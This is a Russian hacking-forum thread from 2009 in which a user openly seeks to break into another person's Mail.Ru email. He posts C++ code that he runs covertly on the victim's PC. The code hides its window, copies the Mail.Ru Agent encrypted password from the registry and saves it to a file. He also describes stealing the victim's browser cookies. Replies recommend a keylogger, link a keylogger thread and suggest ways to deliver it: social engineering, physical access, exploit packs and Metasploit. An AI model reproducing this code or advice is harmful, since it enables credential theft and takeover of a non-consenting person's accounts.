Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Mail.Ru агент 5.2. Кража зашифрованного пароля |
05.01.2009, 23:29
|
|
Новичок
Регистрация: 02.01.2009
Сообщений: 9
Провел на форуме:
6001
Репутация:
1
|
|
Mail.Ru агент 5.2. Кража зашифрованного пароля
Привет. Я имею возможность запустить программу на компе чела, мыло которого хочу взломать. Его мыло, ну к примеру email@mail.ru и он использует Mail.Ru анент 5.2 . В более ранних версиях майл агента можно было легко расшифровать пароль, но в этой версии что то непонятно как его расшифровать. Или как можно использовать этот зашифрованный пароль? Ситуация такая. Я создал код на Borland C++ Builder, который копирует содержимое раздела в реестре, отвечающего за его мыло. Вот код:
//---------------------------------------------------------------------------
#include <vcl.h>
#pragma hdrstop
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
const char *RegKey = "Software\\Mail.Ru\\Agent\\magent_logins";
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
int t = 0;
TRegistry *reg = new TRegistry;
reg->OpenKey(RegKey,true);
void *p = malloc(60);
if (t==0) {t = reg->ReadBinaryData("000#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("001#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("002#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("003#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("004#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("005#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("006#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("007#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("008#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("009#email@mail.ru",p,60);}
if (t==0) {t = reg->ReadBinaryData("010#email@mail.ru",p,60);}
char *x = (char *) p;
for (int i = 0; i<=t; i++)
{
if (x[i]==0) x[i] = 1;
}
Memo1->Clear();
Memo1->Lines->Add(x);
Memo1->Lines->SaveToFile("C:\\res.dat");
free(p);
delete reg;
reg = NULL;
}
//---------------------------------------------------------------------------
void __fastcall TForm1::FormPaint(TObject *Sender)
{
Hide();
}
//---------------------------------------------------------------------------
Ну в общем я украл этот пароль, вставил эти 48 байтов в свой реестр в эту же ветку реестра и в эту же учетную запись (только на своем компе). Но майл агент все равно требует ввести пароль.. :-( Видимо агент еще с чем то взаимодействует. Но если бы я смог расшифровать этот шифрованый пароль, то я бы взломал его мыло. Хэлм ми, плиз. :'( хны. Дайте какие нибудь полезные коды, или расскажите способы как можно украсть этот пароль в незашифрованном виде что-ли.... Я ведь имею возможность запустить на его компе любую программу.
|
|
|
06.01.2009, 00:18
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Выложи что получил то,может там хеш простой и все.
|
|
|
|
06.01.2009, 11:46
|
|
Новичок
Регистрация: 02.01.2009
Сообщений: 9
Провел на форуме:
6001
Репутация:
1
|
|
содержимое зашифр. пароля такое (в шестнадцатеричном виде):
6D 1B E3 D9 C3 6F 73 42 5D 71 56 77 CE B5 45 53 E7 BE E9 19 12 39 98 42 (6C 74 46 0D 0A)
Те последние 5 байтов которые указаны в скобках - это сама моя программа добавила их, они к паролю не относятся. То есть получается 8 х 3 = 24 байта зашифрованного пароля. ;-)
|
|
|
|
06.01.2009, 12:05
|
|
Новичок
Регистрация: 02.01.2009
Сообщений: 9
Провел на форуме:
6001
Репутация:
1
|
|
Еще добавлю, к теме взлома... Он пользуется Opera (браузер такой). Я своровал у него файл cookies4.dat и вставил в свою оперу, его кукисы стали мне доступны. Все параметры страниц которые он посещал мне доступны (язык, цвет фона и т.д.). Даже удалось закачать файл с сайта www.bestreferat.ru по секретной ссылке в кукиесе. Но файла wand.dat у него не было. Это значит что пароли автоматически не сохранялись в его компе. :-( Видимо пароли он вводил вручную. Далее, я своровал кукис от интернет експлорера (Internet Explorer), но там тоже пароль не сохранен.
|
|
|
|
06.01.2009, 13:23
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 47
Провел на форуме:
758806
Репутация:
23
|
|
Сообщение от qenguru
Я ведь имею возможность запустить на его компе любую программу.
Кейлоггер. Вот что тебе нужно.
|
|
|
|
06.01.2009, 17:16
|
|
Новичок
Регистрация: 05.01.2009
Сообщений: 11
Провел на форуме:
26593
Репутация:
0
|
|
Как можно кейлоггеры отправлять и какие виды кейлоггеров?
|
|
|
|
06.01.2009, 17:32
|
|
Познающий
Регистрация: 26.10.2007
Сообщений: 83
Провел на форуме:
335555
Репутация:
45
|
|
Сообщение от nigger
Как можно кейлоггеры отправлять и какие виды кейлоггеров?
http://forum.antichat.ru/printthread.php?t=58361
|
|
|
|
07.01.2009, 07:47
|
|
Новичок
Регистрация: 05.01.2009
Сообщений: 11
Провел на форуме:
26593
Репутация:
0
|
|
/Montana спасибо!  |
|
|
|
07.01.2009, 13:54
|
|
Новичок
Регистрация: 05.01.2009
Сообщений: 11
Провел на форуме:
26593
Репутация:
0
|
|
Вот как отправлять кейлоггеры к другому ПС, какие методы предложите?
|
|
|
|
07.01.2009, 14:19
|
|
Познающий
Регистрация: 26.10.2007
Сообщений: 83
Провел на форуме:
335555
Репутация:
45
|
|
Сообщение от nigger
Вот как отправлять кейлоггеры к другому ПС, какие методы предложите?
Соц. инженерия, физический доступ к компу, или в гугл вбей "связка эксплойтов" почитай, или на отечате поищи мануалы про metasploit framework.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
